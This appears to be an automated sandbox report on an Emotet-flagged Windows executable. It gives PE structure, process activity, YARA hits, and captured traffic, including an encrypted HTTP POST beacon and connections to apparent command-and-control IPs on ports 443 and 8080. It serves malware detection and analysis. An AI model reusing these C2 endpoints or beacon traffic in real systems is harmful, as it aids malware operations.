                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbad00x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd0000x5cc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb0000x8.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x98830x9a00False0.503297483766data6.45508103349IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0xb0000xb2e0xc00False0.160807291667data4.23495809712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xc0000xbd80x200False0.123046875data0.91267432928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xd0000x5cc0x600False0.8671875data6.49434732961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllWTSGetActiveConsoleSessionId

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 3, 2021 01:04:27.744750023 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.795115948 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.795283079 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.796459913 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.848980904 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.849355936 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.849461079 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.849464893 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.849570036 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.849802017 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.902743101 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:58.506544113 CEST497268080192.168.2.3193.169.54.12
                                                                                      Apr 3, 2021 01:05:01.670352936 CEST497268080192.168.2.3193.169.54.12
                                                                                      Apr 3, 2021 01:05:07.670866013 CEST497268080192.168.2.3193.169.54.12
                                                                                      Apr 3, 2021 01:05:50.218765020 CEST497388080192.168.2.3173.230.145.224
                                                                                      Apr 3, 2021 01:05:53.221704960 CEST497388080192.168.2.3173.230.145.224
                                                                                      Apr 3, 2021 01:05:59.222287893 CEST497388080192.168.2.3173.230.145.224

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 3, 2021 01:04:11.626796007 CEST5128153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:11.677638054 CEST53512818.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:12.533082008 CEST4919953192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:12.585621119 CEST53491998.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:13.353194952 CEST5062053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:13.411597967 CEST53506208.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:13.517541885 CEST6493853192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:13.570008993 CEST53649388.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:14.341586113 CEST6015253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:14.390805960 CEST53601528.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:15.288156986 CEST5754453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:15.345732927 CEST53575448.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:16.202591896 CEST5598453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:16.252716064 CEST53559848.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:17.362696886 CEST6418553192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:17.412007093 CEST53641858.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:18.139605045 CEST6511053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:18.195322990 CEST53651108.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:19.028096914 CEST5836153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:19.075795889 CEST53583618.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:20.017126083 CEST6349253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:20.073215008 CEST53634928.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:20.936980963 CEST6083153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:20.988282919 CEST53608318.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:21.884759903 CEST6010053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:21.932210922 CEST53601008.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:22.778618097 CEST5319553192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:22.830749989 CEST53531958.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:23.935580969 CEST5014153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:23.984411955 CEST53501418.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:25.086994886 CEST5302353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:25.138592958 CEST53530238.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.246903896 CEST4956353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:27.293003082 CEST53495638.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:28.189302921 CEST5135253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:28.248847008 CEST53513528.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:29.407177925 CEST5934953192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:29.454309940 CEST53593498.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:49.163181067 CEST5708453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:49.211946964 CEST53570848.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:51.198832035 CEST5882353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:51.261545897 CEST53588238.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:02.180833101 CEST5756853192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:02.246213913 CEST53575688.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:07.678947926 CEST5054053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:07.739001036 CEST53505408.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:14.415618896 CEST5436653192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:14.480581045 CEST53543668.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:28.678618908 CEST5303453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:28.727392912 CEST53530348.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:31.549103975 CEST5776253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:31.617674112 CEST53577628.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:06:03.288327932 CEST5543553192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:06:03.336225986 CEST53554358.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:06:05.225025892 CEST5071353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:06:05.279227972 CEST53507138.8.8.8192.168.2.3

                                                                                      HTTP Request Dependency Graph

                                                                                      • 79.172.249.82:443

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.34971879.172.249.82443C:\Windows\SysWOW64\providernvidia.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Apr 3, 2021 01:04:27.796459913 CEST1345OUTPOST / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: 79.172.249.82:443
                                                                                      Content-Length: 436
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 46 d3 2b 54 ae fc d6 3a 76 c4 9e 73 48 fe 49 d5 f8 b4 aa 2d 29 2b 5f 2f 51 43 49 d6 af b1 ee d1 66 a4 76 ca 80 7e 7d ea e5 1f b8 54 d1 f6 a8 c4 fa a1 57 39 fb 61 52 4d 96 65 1c a6 e5 99 49 14 ec 0a 71 5f e2 5f 33 d0 20 69 8c 9f 5a 32 77 74 73 7c c9 2f 93 bb 77 57 92 b1 7c 99 c3 87 db a5 21 ba d8 2c 2a d2 42 78 56 49 b5 f0 29 02 0c 0b 03 48 d2 8c 0b c9 96 0c 72 db 03 60 c2 fd 84 b6 1e f7 81 47 a2 a2 9f d7 df 4b 9b f8 81 27 f6 3c b6 1e 86 50 82 d3 0f c4 89 b9 d3 fa 11 b7 88 64 d4 13 72 ae 99 42 2a 33 00 d6 11 d6 e3 8f e5 c0 42 f8 4a 5e 4a 03 84 cb 86 dd ca 23 08 65 6d c2 80 b0 5c 78 7a d1 b5 7c 3b a0 03 2f 7e 46 84 fe 20 39 80 e0 81 78 aa bd 76 5f e9 ba 44 da d9 74 a3 d7 62 aa d7 3f 80 3d 8c b4 7a 00 be a8 d2 d3 f9 fb ab 00 f1 69 ea de 4c 42 14 d6 2b ca 76 bc b0 81 d7 e3 64 e6 af 00 43 c2 fa b0 a0 b9 da 47 86 d2 c5 cd 8c 15 59 05 75 39 6e e0 88 2c 4c f3 98 f9 d4 2c cb 9b 5f e7 88 4c 6d 67 98 57 b5 24 85 66 8e 2b 85 05 b1 48 6d e2 d8 2c 6b 5b df 78 26 b4 bf 71 e3 0f db 5f 38 ac 75 b5 12 43 ee 84 ec fb c3 ad 2e ba 07 ba 93 15 f2 d5 a8 d1 7c e9 a8 80 75 3f 62 31 6b 10 eb 5e 0e 5c b6 7e 5f 93 85 d6 88 ce 51 db 56 aa d8 17 1c e6 e8 4d 44 7a ed b0 f6 cf 34 da df 30 cb 84 62 00 1e dc 3c 10 8b a2 b9 0b ca 86 99 83 56 f0 9e af b0 6b 27 04 50 79 50 41 39 0b 87 d2 d8 cb 92 28 81 56 30 24 78 94 30 48
                                                                                      Data Ascii: F+T:vsHI-)+_/QCIfv~}TW9aRMeIq__3 iZ2wts|/wW|!,*BxVI)Hr`GK'<PdrB*3BJ^J#em\xz|;/~F 9xv_Dtb?=ziLB+vdCGYu9n,L,_LmgW$f+Hm,k[x&q_8uC.|u?b1k^\~_QVMDz40b<Vk'PyPA9(V0$x0H
                                                                                      Apr 3, 2021 01:04:27.849355936 CEST1346INHTTP/1.1 400 Bad Request
                                                                                      Date: Fri, 02 Apr 2021 23:04:27 GMT
                                                                                      Server: Apache/2.4.25 (Debian)
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:01:04:18
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Users\user\Desktop\9fdUNaHzLv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\9fdUNaHzLv.exe'
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.194691427.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:19
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Users\user\Desktop\9fdUNaHzLv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\9fdUNaHzLv.exe
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.195820099.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:22
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:22
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:25
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:04:48
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:04:49
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:04:59
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:00
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:00
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:00
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:01
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:02
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                      Imagebase:0x7ff6490c0000
                                                                                      File size:163336 bytes
                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:02
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:04
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:06:03
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                      Imagebase:0x7ff6ddb00000
                                                                                      File size:455656 bytes
                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:01:06:03
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6b2800000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >